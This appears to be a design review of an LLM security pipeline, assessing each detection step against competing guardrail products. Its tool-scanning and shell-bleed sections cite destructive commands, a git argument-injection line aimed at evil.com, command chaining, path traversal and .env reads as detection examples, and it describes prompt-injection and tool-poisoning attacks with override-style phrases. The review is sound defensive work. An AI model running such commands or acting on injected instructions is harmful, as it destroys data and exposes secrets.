Pipeline Step Depth Analysis
End-to-end review of every pipeline step: what’s strong, what’s missing, and what the competition does better. Based on research into LLM Guard, NeMo Guardrails, Rebuff, Vigil, Lakera Guard, Pangea, Arthur Shield, Giskard, TruffleHog, GitLeaks, OWASP LLM Top 10 (2025), and real-world red team reports.
Before the LLM
1. validate_input. Input Validation
Current: Null bytes, UTF-8, garbage ratio, JSON depth, session repair (orphan tool results, empty messages, role merging).
Strengths: Session repair is unique; no competitor does this. It prevents real API errors from broken message arrays. The JSON depth limit prevents stack overflow attacks.
Gaps & Recommendations:
- Missing: Image/multimodal payload validation. GPT-4o and Claude accept images. Steganographic payloads and oversized images are a real attack vector. Add MIME type validation, image dimension/size limits, and optional image content scanning.
- Missing: Token count estimation. Current check is byte-based. A 500KB input could be 200K tokens and cost $50. Add a fast tiktoken-based token estimate and a `max_tokens` config option. LLM Guard does this.
- Missing: Language detection. If the org only operates in EN/FR/DE, reject Cyrillic/CJK input that’s likely an evasion attempt. Pair with injection detection (multilingual attacks bypass EN-only detectors).
- Missing: Schema validation for tool params. Validate tool call arguments against the declared JSON schema before forwarding. Catches malformed tool calls early. Guardrails AI makes this a core feature.
- Improvement: Content-type validation. Tool params could contain serialized objects (pickle, YAML load). Reject non-JSON content types.
Priority: HIGH (multimodal validation is the biggest blind spot as vision models become the default)
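The MIME type and size checks recommended above could be sketched roughly as follows. This is a minimal illustration using only the standard library; `validate_image`, `MAX_IMAGE_BYTES`, and the `MAGIC` table are hypothetical names, and the size limit is an arbitrary placeholder rather than a value taken from the pipeline.

```python
# Hypothetical limit; tune per deployment.
MAX_IMAGE_BYTES = 5 * 1024 * 1024

# Well-known file signatures (magic bytes) for a few common image formats.
MAGIC = {
    "image/png": b"\x89PNG\r\n\x1a\n",
    "image/jpeg": b"\xff\xd8\xff",
    "image/gif": b"GIF8",
}


def validate_image(data: bytes, declared_mime: str) -> list[str]:
    """Return a list of problems; an empty list means the payload passed."""
    problems = []
    if len(data) > MAX_IMAGE_BYTES:
        problems.append("image exceeds size limit")
    signature = MAGIC.get(declared_mime)
    if signature is None:
        problems.append(f"unsupported MIME type: {declared_mime}")
    elif not data.startswith(signature):
        # The declared type and the actual bytes disagree.
        problems.append("content does not match declared MIME type")
    return problems
```

Checking the leading bytes rather than trusting the declared type catches mislabeled payloads cheaply; dimension limits and content scanning would need an image library and are left out of this sketch.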
2. rate_limit. Rate Limiting
Current: Fixed window, sliding window, token-based, per-user, warning threshold.
Strengths: Three strategies is comprehensive. Sliding window prevents burst abuse at boundaries. Warning threshold is good UX.
Gaps & Recommendations:
- Missing: Adaptive rate limiting. If injection attempts are detected, automatically tighten the rate limit for that agent/user. Lakera Guard does this (“threat-responsive throttling”).
- Missing: Cost-based rate limiting. Limit by estimated cost per window (not just tokens). A GPT-4o call can cost more than 10x as much as a GPT-4o-mini call for the same tokens.
- Missing: Concurrency limits. Rate limits control calls/window but not simultaneous inflight calls. An agent sending 100 parallel requests stays under rate limits but DoSes the LLM provider. Add `max_concurrent`.
- Improvement: Exponential backoff headers. Return `Retry-After` with exponential backoff in 429 responses. Standard HTTP but currently missing.
Priority: MEDIUM (adaptive + concurrency most impactful)
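A concurrency cap of the kind described above might look like the sketch below. The `ConcurrencyLimiter` class and its `slot` method are hypothetical and not part of the existing pipeline; `max_concurrent` is the config name suggested in the text.

```python
import threading
from contextlib import contextmanager


class ConcurrencyLimiter:
    """Caps simultaneous in-flight calls per agent (illustrative sketch)."""

    def __init__(self, max_concurrent: int):
        self.max_concurrent = max_concurrent
        self._inflight: dict[str, int] = {}
        self._lock = threading.Lock()

    @contextmanager
    def slot(self, agent_id: str):
        with self._lock:
            current = self._inflight.get(agent_id, 0)
            if current >= self.max_concurrent:
                # A caller would typically translate this into an HTTP 429.
                raise RuntimeError("too many concurrent requests")
            self._inflight[agent_id] = current + 1
        try:
            yield
        finally:
            # Always release the slot, even if the wrapped call fails.
            with self._lock:
                self._inflight[agent_id] -= 1
```

Wrapping each LLM call in `with limiter.slot(agent_id):` rejects the request immediately instead of queueing it, which keeps the limiter independent of the window-based strategies.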
3. budget_enforcement. Budget Control
Current: Monthly USD, monthly tokens, hourly tokens. Reads from pipeline state repo.
Strengths: Three limit types cover most needs.
Gaps & Recommendations:
- Missing: Per-model budget splits. “Max $50/mo on GPT-4o, unlimited GPT-4o-mini.” Right now a single budget covers all models. CISOs want granular cost control.
- Missing: Budget alerts at thresholds. Fire a webhook at 50%, 80%, 90% of budget. Currently only blocks at 100%.
- Missing: Daily/weekly budgets. Monthly is too coarse for startups iterating fast. Daily limits catch runaway agents faster.
- Missing: Budget rollover/carry-forward. Some enterprises want unused budget to carry over.
- Improvement: Real-time cost estimation pre-call. Before calling the LLM, estimate the cost of this specific call and check if it would exceed the budget. Prevents “last call blows the budget” scenarios.
Priority: MEDIUM (per-model splits and alerts are most requested by CISOs)
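Pre-call cost estimation and threshold alerts can be combined in one check, sketched below under stated assumptions. The model names and prices in `PRICE_PER_1K` are made up for illustration, and `check_budget` and `BudgetDecision` are hypothetical names.

```python
from dataclasses import dataclass

# Illustrative per-1K-token prices in USD; real prices vary by provider and date.
PRICE_PER_1K = {"model-large": 0.01, "model-small": 0.001}


@dataclass
class BudgetDecision:
    allowed: bool
    projected_spend: float
    crossed_thresholds: list


def check_budget(spent, limit, model, est_tokens, thresholds=(0.5, 0.8, 0.9)):
    """Estimate this call's cost and decide before the LLM is called."""
    est_cost = est_tokens / 1000 * PRICE_PER_1K[model]
    projected = spent + est_cost
    # A threshold is "crossed" if this call would move spend past it.
    crossed = [t for t in thresholds if spent < t * limit <= projected]
    return BudgetDecision(projected <= limit, projected, crossed)
```

For example, `check_budget(79.0, 100.0, "model-large", 200_000)` would allow the call and report the 80% threshold as crossed, which is the point where a webhook could fire.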
4. detect_pii. PII Detection
Current: Presidio (40+ entity types, NER, context scoring) + 13 regex patterns. Zero-width char stripping for evasion resistance. Custom patterns. Scanner cache integration.
Strengths: Presidio is the gold standard for structured PII. Regex fallback is smart for minimal deployments. Zero-width stripping is good.
Gaps & Recommendations:
- Missing: Multi-language PII. Presidio’s default is EN-only. European CISOs need FR/DE/NL/ES PII patterns (BSN, NISS, Personalausweis, etc.). LLM Guard supports 50+ languages via custom recognizers. Add EU-specific recognizers for Belgian national number (Rijksregisternummer), German Steuer-ID, French NIR, Dutch BSN.
- Missing: Context-aware false positive reduction. “The account number is 1234567890” should flag, but “page 1234567890 of the document” shouldn’t. Presidio’s context scoring helps but needs custom enhancers for business contexts.
- Missing: PII in structured data. If tool params contain JSON with nested PII (e.g., a customer record), the flat text extraction misses it. Add recursive JSON PII scanning.
- Missing: Name detection without Presidio. Regex can’t detect names. When Presidio isn’t installed, names go undetected. Add a lightweight name dictionary (top 10K names across EU languages) as a fallback.
- Improvement: Configurable entity sensitivity. Not all PII is equal. A first name is less sensitive than a credit card. Allow per-entity-type `on_detection` overrides: `"CREDIT_CARD": "block"`, `"PERSON": "notify"`.
Priority: HIGH (EU multi-language PII is a must-have for European positioning)
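Recursive JSON scanning, as recommended for structured tool params, could be sketched like this. The single `EMAIL` regex stands in for the full detector set, and `scan_json` is a hypothetical helper name.

```python
import re

# One illustrative pattern; a real deployment would plug in its full detector set.
EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def scan_json(value, path="$"):
    """Walk nested dicts/lists and yield (json_path, match) for every string hit."""
    if isinstance(value, dict):
        for key, child in value.items():
            yield from scan_json(child, f"{path}.{key}")
    elif isinstance(value, list):
        for index, child in enumerate(value):
            yield from scan_json(child, f"{path}[{index}]")
    elif isinstance(value, str):
        for match in EMAIL.finditer(value):
            yield path, match.group()
```

Returning the JSON path alongside each match lets a redaction step rewrite the exact field instead of searching flattened text.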
5. detect_secrets. Secret Detection
Current: 74 regex patterns (AWS, GCP, Azure, OpenAI, GitHub, Stripe, etc.), Shannon entropy, base64 decoding, line-joining, comment-stripping, reversal detection. Custom patterns.
Strengths: Pattern database is competitive with TruffleHog/GitLeaks. Evasion detection (base64, line-joining, comments, reversal) is deeper than most. Entropy detection catches unknown formats.
Gaps & Recommendations:
- Missing: Verification/validation. TruffleHog’s killer feature: it actually validates detected secrets (calls AWS STS, checks GitHub token scopes). A verified secret is 100x more actionable than a regex match. Add optional async verification for top providers (AWS, GitHub, Slack, Stripe).
- Missing: Git diff / commit context. When the input contains code diffs or commit messages, the secret might be in a `-` line (removed) vs `+` line (added). Only `+` lines matter. Add diff-aware scanning.
- Missing: Allowlisting. Known-safe patterns (test keys, example tokens, documentation patterns) cause noise. Add `allow_patterns` config. TruffleHog and GitLeaks both have this.
- Missing: Secret rotation recommendations. When a secret is detected, tell the user what to do: “Rotate this AWS key at console.aws.amazon.com/iam.” Pangea does this.
- Improvement: Reduce false positives on JWTs. The `jwt` pattern matches any JWT, but JWTs are designed to be sent; they’re not secrets. Flag JWTs only when they appear in unexpected contexts (user message, not auth header). Currently high FP.
- Missing: HashiCorp Vault transit tokens, Doppler tokens, 1Password service accounts, Infisical tokens. Growing secret managers have their own token formats.
Priority: HIGH (verification transforms this from “maybe a secret” to “confirmed leaked credential”)
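Diff-aware scanning combined with an allowlist could be sketched as follows. The single `SECRET` regex (the AWS access key ID shape) stands in for the real pattern database, `scan_diff` is a hypothetical name, and `allow_patterns` is the config name suggested in the text.

```python
import re

# Illustrative detector: "AKIA" followed by 16 uppercase letters or digits.
SECRET = re.compile(r"AKIA[0-9A-Z]{16}")


def scan_diff(diff_text, allow_patterns=()):
    """Report secrets on added lines only, skipping allowlisted matches."""
    allow = [re.compile(p) for p in allow_patterns]
    findings = []
    for line in diff_text.splitlines():
        # "+++" is the file header of a unified diff, not an added line.
        if not line.startswith("+") or line.startswith("+++"):
            continue
        for match in SECRET.finditer(line[1:]):
            if not any(a.search(match.group()) for a in allow):
                findings.append(match.group())
    return findings
```

With `allow_patterns=[r"EXAMPLE$"]`, documentation keys such as `AKIAIOSFODNN7EXAMPLE` are skipped while other added keys are still reported.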
6. detect_infra. Infrastructure Data
Current: 10 patterns (internal hostname, private IP, DB connection string, env server, infra config, infra service, K8s config, Docker registry, custom domain).
Strengths: Catches the common categories.
Gaps & Recommendations:
- Missing: Cloud-specific resource identifiers. AWS ARNs (`arn:aws:*`), GCP resource names (`projects/*/locations/*`), Azure resource IDs (`/subscriptions/*/resourceGroups/*`). These leak cloud topology.
- Missing: Internal URL detection. URLs with `.internal`, `.local`, `.corp`, `.lan` TLDs, or non-public DNS (e.g., `api.staging.acme.internal`).
- Missing: CI/CD identifiers. GitHub Actions workflow URLs, Jenkins build URLs, GitLab CI pipeline references. These reveal deployment infrastructure.
- Missing: Kubernetes secrets in plain text. `kubectl get secret -o yaml` output contains base64-encoded secrets that aren’t caught by detect_secrets because they’re in a YAML context.
- Improvement: Configurable internal domain patterns. Every org has different internal domains. Add `internal_domains: ["*.acme.internal", "*.corp.acme.com"]` config.
Priority: MEDIUM (cloud ARNs and internal URLs are the most commonly leaked)
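A rough sketch of ARN detection plus configurable internal domain matching is shown below. The `ARN` regex is deliberately loose and is an assumption about what a useful first pass looks like, not an exhaustive grammar; `find_infra_leaks` is a hypothetical name, and `internal_domains` follows the config shape suggested above.

```python
import re
from fnmatch import fnmatch
from urllib.parse import urlparse

# Loose ARN shape: arn:partition:service:region:account-id:resource
ARN = re.compile(r"arn:aws[a-z-]*:[a-z0-9-]+:[a-z0-9-]*:\d{0,12}:\S+")
URL = re.compile(r"https?://[^\s\"'<>]+")


def find_infra_leaks(text, internal_domains):
    """Return (kind, value) pairs for cloud ARNs and URLs on internal hosts."""
    findings = [("cloud_arn", m.group()) for m in ARN.finditer(text)]
    for m in URL.finditer(text):
        host = urlparse(m.group()).hostname or ""
        # Glob-style patterns such as "*.acme.internal" come from config.
        if any(fnmatch(host, pattern) for pattern in internal_domains):
            findings.append(("internal_url", m.group()))
    return findings
```

GCP and Azure resource identifiers would follow the same approach with their own patterns.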
7. detect_business. Business Data
Current: 9 patterns (financial figure, large amount, board decision, strategic info, competitive intel, customer data, HR personnel, legal matter).
Strengths: Covers the major categories. Unique step; no competitor does this.
Gaps & Recommendations:
- Missing: Industry-specific patterns. Healthcare (diagnosis codes, drug names, patient IDs), legal (case numbers, court references), financial (SWIFT codes, ISIN numbers, CUSIPs). Configurable per industry.
- Missing: Context-aware matching. “$50M” in a financial report discussion is expected; in a casual question it’s a leak. Weight by surrounding context.
- Missing: Code names / project names. Many orgs use code names for M&A targets, products, etc. Add configurable `sensitive_terms: ["Project Phoenix", "Operation Sunrise"]`.
- Missing: NDA/confidentiality markers. Text containing “CONFIDENTIAL”, “PRIVILEGED”, “ATTORNEY-CLIENT” should auto-escalate classification.
- Improvement: Revenue/valuation number extraction. Current patterns are simple regex. Use numeric extraction with currency awareness to catch “twelve million dollars” and “€2.5M revenue.”
Priority: MEDIUM (NDA markers and custom terms are quick wins)
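The two quick wins named above (custom terms and confidentiality markers) fit in a few lines. In this sketch `business_flags` and `MARKERS` are hypothetical names; the marker list and the `sensitive_terms` values are the ones quoted in the text.

```python
import re

MARKERS = ("CONFIDENTIAL", "PRIVILEGED", "ATTORNEY-CLIENT")


def business_flags(text, sensitive_terms):
    """Return (kind, term) pairs for configured code names and confidentiality markers."""
    flags = []
    for term in sensitive_terms:
        # Case-insensitive whole-phrase match, so "phoenix" alone does not fire.
        if re.search(rf"(?<!\w){re.escape(term)}(?!\w)", text, re.IGNORECASE):
            flags.append(("sensitive_term", term))
    for marker in MARKERS:
        # Markers are matched case-sensitively because they are conventionally upper-case.
        if marker in text:
            flags.append(("confidentiality_marker", marker))
    return flags
```

Any non-empty result could feed the classification step as an escalation signal.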
8. detect_unicode. Unicode / Homoglyph
Current: 85+ dangerous codepoints, 85+ confusable mappings, suspicious categories, combining mark floods, mixed-script detection, zero-width chars, bidi overrides.
Strengths: Very thorough. Mixed-script word detection is rare among competitors. Combining mark flood detection is good.
Gaps & Recommendations:
- Missing: Punycode/IDN homoglyph detection. Internationalized domain names can contain homoglyphs (`аpple.com` with Cyrillic `а`). Detect Punycode domains in URLs.
- Missing: Invisible character normalization. Instead of just detecting zero-width chars, offer a normalization mode that strips them and continues. Useful when blocking is too aggressive (accessibility tools insert zero-width chars).
- Improvement: Configurable script allowlists. A Japanese org expects CJK; a European org expects Latin+Cyrillic. `allowed_scripts: ["Latin", "Common"]` would reduce FPs.
Priority: LOW (current implementation is already strong)
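Punycode homoglyph detection can be approximated with the standard library, as in the sketch below. It decodes `xn--` labels with Python's built-in `punycode` codec and approximates a character's script by the first word of its Unicode name, which is a simplification (the standard library has no script property). `scripts_in` and `suspicious_labels` are hypothetical names.

```python
import unicodedata


def scripts_in(label):
    """Approximate each letter's script by the first word of its Unicode name."""
    return {
        unicodedata.name(ch, "UNKNOWN").split()[0]
        for ch in label
        if ch.isalpha()
    }


def suspicious_labels(hostname):
    """Decode Punycode labels and return those that mix scripts (e.g. Latin + Cyrillic)."""
    flagged = []
    for label in hostname.lower().split("."):
        if label.startswith("xn--"):
            # Strip the ACE prefix and decode the remainder.
            label = label[4:].encode("ascii").decode("punycode")
        if len(scripts_in(label)) > 1:
            flagged.append(label)
    return flagged
```

This only catches labels that mix scripts; a label written entirely in a look-alike script would need the existing confusable mappings to detect.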
9. detect_injection. Prompt Injection
Current: 87 patterns across 7 categories (structural, behavioral, jailbreaks, obfuscation, indirect, multilingual, metaphorical). Base64 decoding, leetspeak normalization, compound scoring. Tool result scanning. Custom patterns.
Strengths: Deepest regex-based injection detector I’ve seen. Multilingual coverage (10 languages), metaphorical bypass detection, and indirect injection detection from tool outputs are all rare. Compound scoring for weak signals is smart.
Gaps & Recommendations:
- Missing: ML-based classifier. Regex catches known patterns but misses novel attacks. Rebuff uses a fine-tuned BERT classifier alongside regex. Lakera Guard’s core is an ML model. Add an optional lightweight classifier (DistilBERT fine-tuned on injection datasets) as a second opinion alongside regex. Run it only when regex score is ambiguous (0.3-0.7).
- Missing: Perplexity-based detection. Novel attacks have high perplexity (unusual token sequences). LLM Guard uses perplexity scoring as a signal. A fast perplexity estimate using a small model could catch attacks that don’t match any pattern.
- Missing: Prompt/response boundary enforcement. Ensure the LLM’s system prompt separator hasn’t been breached. NeMo Guardrails enforces strict message boundaries.
- Missing: Canary token injection. Inject a unique canary into the system prompt; if it appears in the output, the system prompt was leaked. Lakera and Arthur Shield use this technique.
- Missing: Multi-turn injection tracking. A slow injection spread across 5 turns (each individually benign) isn’t caught. Track injection scores across the session and alert on cumulative risk.
- Missing: Image-based injection. Text rendered in images bypasses all text-based detection. As vision models become standard, OCR-based injection scanning is needed.
- Improvement: Adversarial robustness testing. Run the HackAPrompt and Gandalf datasets as a CI benchmark. Track detection rate over time. Giskard provides this as a testing framework.
Priority: CRITICAL (ML classifier is the single biggest improvement; it catches novel attacks regex never will)
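Of the gaps listed, canary token injection is the simplest to illustrate. The sketch below is one possible shape; `add_canary` and `leaked` are hypothetical names, and the marker wording is an arbitrary choice.

```python
import secrets


def add_canary(system_prompt):
    """Append a random marker to the system prompt and return (prompt, canary)."""
    canary = f"canary-{secrets.token_hex(8)}"
    guarded = f"{system_prompt}\n[internal marker, never reveal: {canary}]"
    return guarded, canary


def leaked(output, canary):
    """True if the model's output reproduces the canary, implying prompt leakage."""
    return canary in output
```

Generating a fresh canary per session means a leaked value also identifies which conversation exposed the system prompt.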
10. detect_escalation. Privilege Escalation
Current: 4-stage model (recon → access → exfil → priv-esc), cross-turn tracking, context-aware scoring, keyword combinations.
Strengths: Multi-stage model is more sophisticated than simple keyword matching. Context awareness reduces FPs.
Gaps & Recommendations:
- Missing: Behavioral baseline. What’s “normal” for this agent? An admin agent asking for user lists is normal; a customer support agent doing it is suspicious. Add per-agent behavioral profiles.
- Missing: Semantic similarity to known attack chains. Use embedding similarity against a database of known escalation chains (e.g., MITRE ATLAS, the ATT&CK-style knowledge base for AI systems).
- Improvement: Integration with tool permissions. If the agent asks about tools it doesn’t have permission to use, that’s a stronger recon signal than generic questions.
Priority: LOW (current implementation is adequate for most use cases)
11. detect_tool_poison. Tool Poisoning
Current: 11 patterns for injection in tool descriptions (ignore instructions, override system, act as, do not tell, exfiltration URLs, priority manipulation, hidden instructions).
Strengths: Catches the known MCP tool poisoning attacks.
Gaps & Recommendations:
- Missing: Tool schema validation. Verify tool definitions match an expected schema. An attacker could add extra parameters not in the spec that carry injection payloads.
- Missing: Tool definition diffing. If a tool’s description changed since last seen, flag it. Supply chain attacks modify tool definitions gradually.
- Missing: URL/domain reputation check. Tool descriptions containing URLs to unknown/suspicious domains should be flagged. Use a domain reputation API (VirusTotal, URLhaus).
- Missing: Excessive instruction detection. Tool descriptions longer than N chars or containing unusual formatting (multiple paragraphs of “IMPORTANT” instructions) are suspicious.
- Improvement: Hash-based tool integrity. Store a hash of each tool’s definition at registration. If it changes at runtime, alert. This catches dynamic tool poisoning via compromised MCP servers.
Priority: HIGH (supply chain attacks via MCP are a growing threat; tool integrity verification is essential)
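Hash-based tool integrity could be sketched as below, assuming tool definitions are JSON-serializable dicts with a `name` key. `tool_fingerprint` and `ToolRegistry` are hypothetical names.

```python
import hashlib
import json


def tool_fingerprint(definition):
    """SHA-256 over a canonical JSON encoding, so key order does not matter."""
    canonical = json.dumps(definition, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


class ToolRegistry:
    def __init__(self):
        self._known = {}

    def register(self, definition):
        """Record the fingerprint of a tool definition at registration time."""
        self._known[definition["name"]] = tool_fingerprint(definition)

    def changed(self, definition):
        """True if the tool is unknown or its definition differs from registration."""
        return self._known.get(definition["name"]) != tool_fingerprint(definition)
```

Canonicalizing before hashing avoids false alerts when a server merely reorders keys; any change to the description or parameters still produces a different fingerprint.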
12. classify_data. Data Classification
Current: 4-level classification (PUBLIC → INTERNAL → CONFIDENTIAL → RESTRICTED). Aggregates all detection findings. Optional LLM semantic classifier. LLM can only escalate, never downgrade.
Strengths: Deterministic classification from regex findings + optional LLM escalation is the right architecture. “Can only escalate” is a good security principle.
Gaps & Recommendations:
- Missing: Org-specific classification rules. “Any mention of Project X is RESTRICTED.” “All customer IDs are CONFIDENTIAL.” Allow CISO-defined rules beyond the built-in heuristics.
- Missing: Data classification labels/tags. Beyond the 4 levels, support custom tags: “GDPR_PERSONAL_DATA”, “HIPAA_PHI”, “SOX_FINANCIAL”. This enables regulatory-specific routing.
- Improvement: Confidence scoring. Return a confidence level with the classification. “CONFIDENTIAL (95%)” vs “CONFIDENTIAL (62%).” Low confidence triggers the LLM classifier automatically.
Priority: MEDIUM (custom rules and regulatory tags most valuable)
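Org-specific rules and regulatory tags can sit on top of the existing "escalate only" principle. In the sketch below the four levels come from the text, while the `classify` function, the rule tuple format, and the substring matching are illustrative assumptions.

```python
from enum import IntEnum


class Level(IntEnum):
    PUBLIC = 0
    INTERNAL = 1
    CONFIDENTIAL = 2
    RESTRICTED = 3


def classify(text, base_level, rules):
    """Apply (substring, level, tag) rules; the level can only go up."""
    level, tags = base_level, set()
    lowered = text.lower()
    for needle, rule_level, tag in rules:
        if needle.lower() in lowered:
            # max() enforces escalate-only: a rule never downgrades.
            level = max(level, rule_level)
            tags.add(tag)
    return level, tags
```

A rule such as `("Project X", Level.RESTRICTED, "ORG_SECRET")` raises an INTERNAL finding to RESTRICTED, while a CONFIDENTIAL rule applied to already RESTRICTED content only adds its tag.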
The Call
13. call_llm. LLM Call
Current: Timeout, fallback model, circuit breaker with error classification, cooldown with retry-after.
Strengths: Circuit breaker with error classification is production-grade. Fallback model prevents outages.
Gaps & Recommendations:
- Missing: Request/response logging for compliance. Log the full request and response (with PII redacted) for audit. GDPR Article 30 requires processing records.
- Missing: Model version pinning. LLM providers update models silently. A pinned version (`gpt-4o-2024-11-20`) prevents surprise behavior changes. Add `pin_version` config.
- Missing: Response validation. Check that the response is well-formed (valid JSON for function calls, non-empty content). Malformed responses should retry, not propagate.
- Missing: Streaming support. Currently blocks on full response. Streaming would reduce time-to-first-token. More complex to scan but important for UX.
Priority: MEDIUM (streaming is the most impactful for developer experience)
14. call_tool. Tool Call
Current: Timeout, response size limit, error redaction.
Strengths: Good basics.
Gaps & Recommendations:
- Missing: Sandboxed execution. Tool calls should execute in a sandboxed environment (container, WASM, seccomp). Currently relies on the tool itself being safe.
- Missing: Network isolation. Tool calls shouldn’t be able to reach arbitrary endpoints. Add configurable network policies (allow/deny lists for outbound connections).
- Missing: Resource limits. CPU time, memory, disk I/O limits for tool execution. Prevents resource exhaustion attacks.
- Missing: Output sanitization. Tool output could contain HTML, JavaScript, or other injection payloads that flow back to the LLM. Sanitize before returning.
Priority: HIGH (sandboxing is the #1 missing capability for agentic security)
15. tool_permissions / tool_constraints / user_tool_scopes
Current: Per-tool allow/block, per-operation permissions, parameter validation (string patterns, numeric ranges, length, cross-parameter), user-level scoping.
Strengths: The three-layer model (permissions → constraints → scopes) is more granular than any competitor.
Gaps & Recommendations:
- Missing: Time-based permissions. “Tool X only allowed during business hours.” “Emergency access to production database for 2 hours.” Temporal access control is standard in enterprise IAM.
- Missing: Approval workflows. “Tool X requires manager approval before execution.” For high-risk operations, add a human-in-the-loop step.
- Missing: Tool call rate limiting. Separate from the global rate limit. “Max 10 database queries per minute” prevents a stuck agent from hammering a database.
- Improvement: Permission inheritance. Group tools into categories with shared permissions. Currently each tool is configured individually.
Priority: MEDIUM (time-based permissions and approval workflows most requested)
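The two temporal examples above (business-hours access and a two-hour emergency grant) might be modeled as follows. `in_business_hours` and `TemporaryGrant` are hypothetical names, and the 09:00 to 17:00 weekday window is an arbitrary default.

```python
from datetime import datetime, time, timedelta


def in_business_hours(now, start=time(9, 0), end=time(17, 0)):
    """Weekdays only; start is inclusive, end is exclusive."""
    return now.weekday() < 5 and start <= now.time() < end


class TemporaryGrant:
    """Emergency access that expires after a fixed duration."""

    def __init__(self, granted_at, duration):
        self.expires_at = granted_at + duration

    def active(self, now):
        return now < self.expires_at
```

Passing `now` explicitly keeps both checks deterministic in tests; a production version would also need to settle on a time zone.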
16. scan_tool_calls. Tool Call Scanning
Current: 4 regex patterns, deny command/path lists, fnmatch for path patterns, shell argument parsing.
Strengths: Shell argument parsing with shlex is better than naive string matching.
Gaps & Recommendations:
- Missing: Semantic command analysis. `rm -rf /` is caught, but `find / -delete` or `python -c "import shutil; shutil.rmtree('/')"` aren’t. Need a broader dangerous operation database.
- Missing: File path normalization. `../../etc/passwd`, `/var/../etc/passwd`, symlink following. Normalize paths before matching deny patterns.
- Missing: Argument injection detection. `git clone https://evil.com -- --upload-pack="evil"`. Detect double-dash argument injection.
- Missing: Command chaining detection. `echo safe && rm -rf /` or `echo safe; rm -rf /`. Parse command chains, not just the first command.
- Improvement: Integration with detect_code_exec. Currently these are separate. Code execution detection should feed into tool call scanning for a unified view.
Priority: HIGH (command chaining and path traversal are common bypasses)
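Command chaining and path normalization can both be handled with the standard library, as sketched below. It assumes Python 3.8 or later, where `shlex` supports `punctuation_chars` together with `whitespace_split`; `DENY_COMMANDS` is an illustrative list and the function names are hypothetical.

```python
import posixpath
import shlex

SEPARATORS = {"&&", "||", ";", "|", "&"}
DENY_COMMANDS = {"rm", "mkfs", "dd"}  # illustrative deny list


def split_chain(command_line):
    """Split a shell line into individual commands at chaining operators."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for token in lexer:
        if token in SEPARATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def denied_commands(command_line):
    """Return every command in the chain whose executable is on the deny list."""
    return [cmd for cmd in split_chain(command_line) if cmd[0] in DENY_COMMANDS]


def normalize_path(path, cwd="/"):
    """Resolve '.' and '..' lexically; symlinks are not followed here."""
    return posixpath.normpath(posixpath.join(cwd, path))
```

Because the lexer respects quoting, `echo 'rm -rf /'` is treated as a harmless argument, while `echo safe; rm -rf /` yields a second command that hits the deny list. Symlink resolution would need filesystem access and is left out.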
After the LLM
17. scan_output. Output Scan + DLP
Current: PII, secrets, infra, business data detection on response. Redaction of PII, infra, business data. Stack trace stripping. Sensitive pattern removal (paths, internal URLs, private keys). LLM safety judge option. Scanner cache integration.
Strengths: Full DLP pipeline is unique. Stack trace stripping prevents information disclosure. LLM judge as optional second opinion is good architecture.
Gaps & Recommendations:
- Missing: Hallucination detection. If the LLM generates a plausible-looking but fake API key, phone number, or address, it could cause downstream issues. Cross-reference generated data against the input to detect fabrication.
- Missing: Toxicity/bias detection. OWASP LLM Top 10 includes harmful output. Add content safety scoring (toxicity, bias, adult content). LLM Guard has multiple output content validators.
- Missing: Factual grounding check. For RAG applications, verify the output is grounded in the retrieved context. Detect when the LLM ignores the context and hallucinates.
- Missing: Jailbreak success detection. If detect_injection flagged the input but the LLM responded anyway (not blocked), check if the response actually complied with the injection. This is what the LLM judge should specifically look for.
- Improvement: Streaming-compatible scanning. Current scan requires the full response. For streaming, implement incremental scanning with a sliding window.
- Missing: Output format validation. If the agent expects JSON, validate the output is valid JSON before returning. Malformed output causes agent crashes.
Priority: HIGH (toxicity/content safety is a major gap; required by EU AI Act)
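Incremental scanning with a sliding window could work roughly as sketched below. To keep the logic simple, the sketch assumes a single fixed-length pattern (the AWS access key ID shape), so a match is never partially visible; variable-length patterns would need extra bookkeeping. `scan_stream` is a hypothetical name.

```python
import re

# Fixed-length pattern, so a match is either fully present in the window or absent.
PATTERN = re.compile(r"AKIA[0-9A-Z]{16}")
MAX_MATCH_LEN = 20


def scan_stream(chunks):
    """Yield matches from a chunked stream, including ones that straddle chunks."""
    tail = ""
    for chunk in chunks:
        window = tail + chunk
        for match in PATTERN.finditer(window):
            yield match.group()
        # Keep just under one match length: enough to complete a split match,
        # too short to contain (and re-report) a whole one.
        tail = window[-(MAX_MATCH_LEN - 1):]
```

This detects secrets that are split across chunk boundaries, but it does not by itself stop earlier chunks from reaching the client; redaction in a streaming setting would also require holding back the tail before forwarding.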
18. taint_check. Taint Tracking
Current: Tracks PII and secrets from input. Checks if they flow into tool call arguments. Categorized sinks (shell, network, code, email, database).
Strengths: Taint tracking is rare in LLM security. Sink categorization is thoughtful.
Gaps & Recommendations:
- Missing: Taint propagation through tool chains. In a multi-step agent, data flows: input → tool1 → tool2 → tool3. Current implementation only tracks input → first tool call. Need cross-step propagation.
- Missing: Derived data tracking. If the LLM sees `john@acme.com` and generates `john at acme dot com`, the taint is lost. Add fuzzy matching for derived forms.
- Improvement: Configurable sink sensitivity. Not all sinks are equal. Writing to a local log file is less dangerous than sending via email. Allow per-sink `on_detection` overrides.
Priority: MEDIUM (multi-step propagation is the most impactful improvement)
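Derived-form matching for the email example above can start with a simple normalization pass. This sketch only handles spelled-out "at" and "dot" variants and is not a general fuzzy matcher; `normalize_obfuscated` and `tainted_values_in` are hypothetical names.

```python
import re


def normalize_obfuscated(text):
    """Undo common spelled-out email obfuscations before taint matching."""
    text = text.lower()
    text = re.sub(r"\s+(?:at|\(at\)|\[at\])\s+", "@", text)
    text = re.sub(r"\s+(?:dot|\(dot\)|\[dot\])\s+", ".", text)
    return text


def tainted_values_in(output, tainted):
    """Return tainted values found in the output, verbatim or in a derived form."""
    lowered = output.lower()
    normalized = normalize_obfuscated(output)
    return [v for v in tainted if v.lower() in lowered or v.lower() in normalized]
```

The normalized text is used only for matching, so the fact that ordinary phrases like "look at this" get rewritten does not affect what is returned to the user.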
19. shell_bleed. Shell Bleed Detection
Current: 5-language env var detection (Shell, Python, Node, Ruby), safe var exclusion, secret keyword matching.
Strengths: Multi-language support is comprehensive.
Gaps & Recommendations:
- Missing: .env file reference detection. `cat .env`, `source .env`, `dotenv.config()`. References to dotenv files are as dangerous as direct env var references.
